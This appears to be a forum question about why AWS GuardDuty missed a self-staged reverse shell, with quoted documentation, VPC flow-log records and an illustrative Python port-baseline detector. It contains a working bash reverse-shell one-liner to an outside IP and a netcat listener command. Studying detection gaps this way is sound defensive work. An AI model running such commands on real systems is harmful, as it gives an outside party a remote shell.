
Why doesn't AWS GuardDuty detect a reverse shell?

I ran nc -nvlp 6666 on an example "attacker" AWS EC2 instance, and then I ran a bash reverse shell on my EC2 instance, which sits in a public subnet and is monitored by GuardDuty and VPC flow logs: bash -i >& /dev/tcp/54.4.4.12/6666 0>&1

Why does AWS GuardDuty not treat this attack as suspicious under the following finding type:

Behavior:EC2/NetworkPortUnusual
An EC2 instance is communicating with a remote host on an unusual server port.
Default severity: Medium

Data source: VPC Flow Logs

This finding informs you that the listed EC2 instance in your AWS environment is behaving in a way that deviates from the established baseline. This EC2 instance has no prior history of communications on this remote port.

Note
If the EC2 instance communicated on port 389 or port 1389, then the associated finding severity will be modified to High, and the finding fields will include the following value:

service.additionalInfo.context = Possible log4j callback

(Before running the reverse shell, I had GuardDuty running with VPC flow logs for 6 days.)

The traffic does show up in the flow logs:

2022-01-04 08:41:03.000
5 966416534288 eni-XXXXg 172.12.13.6 54.X.X.X 32962 6666 6 5 273 1641278463 1641278522 ACCEPT OK vpc-XXXXX egress

2022-01-04 09:50:09.000
5 966416534288 eni-XXXXg 172.12.13.6 54.X.X.X 34392 6666 6 6 416 1641282609 1641282665 ACCEPT OK vpc-XXXXX egress

2022-01-04 09:52:07.000
5 966416534288 eni-XXXXg 172.12.13.6 54.X.X.X 34434 6666 6 24 2517 1641282727 1641282785 ACCEPT OK vpc-XXXXX egress
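The Behavior:EC2/NetworkPortUnusual description quoted above amounts to a "first-seen remote port per instance" baseline over flow-log records. The following is an added example written for this page, not code from the question or answer and not GuardDuty's own algorithm (which AWS does not publish); it runs that kind of check over the custom flow-log format the question uses (default v2 fields plus vpc-id and flow-direction). Assumptions: the six-day baseline records are constructed here; 54.4.4.12 stands in for the masked 54.X.X.X attacker address; an egress flow whose instance-side source port is ephemeral (>= 32768, the Linux default) is taken as a connection the instance initiated, so replies from a listening service are not counted as "remote ports"; the cutoff between baseline and detection windows is chosen as 2022-01-04 08:00:00 UTC; and the page's 389/1389 severity note is mirrored as-is.

```python
"""
Added example: a first-seen-remote-port baseline over VPC Flow Log records.
Illustrative only; not GuardDuty's algorithm and not code from the Q&A.
"""
from collections import defaultdict

# Field order of the custom flow-log format in the question: default v2
# fields followed by vpc-id and flow-direction.
FIELDS = (
    "version account_id interface_id srcaddr dstaddr srcport dstport "
    "protocol packets bytes start end action log_status vpc_id flow_direction"
).split()
INT_FIELDS = ("srcport", "dstport", "protocol", "packets", "bytes", "start", "end")

# Assumption: Linux default net.ipv4.ip_local_port_range lower bound. A flow
# whose instance-side port is in this range was initiated by the instance.
EPHEMERAL_MIN = 32768
# Mirrors the documentation note quoted in the question.
LOG4J_CALLBACK_PORTS = {389, 1389}


def parse_record(line):
    """Parse one record. A leading 'YYYY-MM-DD HH:MM:SS.fff' ingestion
    timestamp, as in the question's paste, is tolerated and skipped."""
    parts = line.split()
    if len(parts) == len(FIELDS) + 2:
        parts = parts[2:]
    if len(parts) != len(FIELDS):
        raise ValueError(f"unexpected field count {len(parts)}: {line!r}")
    rec = dict(zip(FIELDS, parts))
    for k in INT_FIELDS:
        rec[k] = int(rec[k])
    return rec


def outbound_connection(rec):
    """Accepted egress flow the instance itself initiated (ephemeral source
    port). Egress replies from a listening service (e.g. srcport 22 to a
    client's ephemeral port) are excluded so clients of a server do not
    pollute the remote-port baseline."""
    return (rec["flow_direction"] == "egress"
            and rec["action"] == "ACCEPT"
            and rec["srcport"] >= EPHEMERAL_MIN)


def learn_baseline(records, cutoff):
    """Remote (destination) ports each ENI talked to before `cutoff`."""
    seen = defaultdict(set)
    for rec in records:
        if rec["start"] < cutoff and outbound_connection(rec):
            seen[rec["interface_id"]].add(rec["dstport"])
    return seen


def detect_unusual_ports(records, baseline, cutoff):
    """One finding per (ENI, remote port) pair first seen after `cutoff`."""
    findings, reported = [], set()
    for rec in records:
        if rec["start"] < cutoff or not outbound_connection(rec):
            continue
        key = (rec["interface_id"], rec["dstport"])
        if rec["dstport"] in baseline.get(rec["interface_id"], set()) or key in reported:
            continue
        reported.add(key)
        finding = {
            "type": "NetworkPortUnusual (illustrative)",
            "interface_id": rec["interface_id"],
            "remote_ip": rec["dstaddr"],
            "remote_port": rec["dstport"],
            "severity": "Medium",
            "first_seen": rec["start"],
        }
        if rec["dstport"] in LOG4J_CALLBACK_PORTS:
            finding["severity"] = "High"
            finding["context"] = "Possible log4j callback"
        findings.append(finding)
    return findings


# Constructed sample input. Ids are the placeholders from the question; the
# three port-6666 records reuse the question's start times and counts; the
# rest (baseline traffic, an SSH reply, a port-1389 callback) is made up.
ENI, VPC, ACCT, SRC = "eni-XXXXg", "vpc-XXXXX", "966416534288", "172.12.13.6"
DETECTION_START = 1641278400  # assumed cutoff: 2022-01-04 08:00:00 UTC


def _rec(dst, sport, dport, start, pkts=10, byts=1000):
    return " ".join(map(str, [5, ACCT, ENI, SRC, dst, sport, dport, 6, pkts,
                              byts, start, start + 60, "ACCEPT", "OK", VPC, "egress"]))


SAMPLE_LOG = [
    _rec("52.0.0.10", 40122, 443, 1640760000),    # baseline: HTTPS
    _rec("52.0.0.10", 40123, 443, 1640846400),
    _rec("52.0.0.11", 40200, 80, 1640932800),     # baseline: HTTP
    _rec("172.12.0.2", 40300, 53, 1641019200, 2, 150),  # baseline: DNS
    _rec("203.0.113.7", 22, 51000, 1641105600),   # SSH reply; instance is server
    "2022-01-04 08:41:03.000 " + _rec("54.4.4.12", 32962, 6666, 1641278463, 5, 273),
    "2022-01-04 09:50:09.000 " + _rec("54.4.4.12", 34392, 6666, 1641282609, 6, 416),
    "2022-01-04 09:52:07.000 " + _rec("54.4.4.12", 34434, 6666, 1641282727, 24, 2517),
    _rec("198.51.100.9", 35001, 1389, 1641283000),  # constructed LDAP callback
    _rec("52.0.0.10", 36000, 443, 1641283100),    # routine HTTPS, in baseline
]


def run_example():
    records = [parse_record(line) for line in SAMPLE_LOG]
    baseline = learn_baseline(records, DETECTION_START)
    return baseline, detect_unusual_ports(records, baseline, DETECTION_START)


if __name__ == "__main__":
    for f in run_example()[1]:
        print(f)
```

Run against the sample, the three reverse-shell flows collapse into a single Medium finding for port 6666, the 1389 flow becomes a High finding with the log4j context, and the post-cutoff HTTPS flow is silent because 443 is in the baseline. The point for the question is that a flow-log-only detector of this shape is driven entirely by what the baseline window happened to contain and by how "remote port" is defined; nothing in the record says anything about a shell.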

GuardDuty uses its own copy of the flow logs for analysis, so you do not need to enable them separately from GuardDuty unless you need the logs for other purposes. See https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_data-sources.html#guardduty_vpc
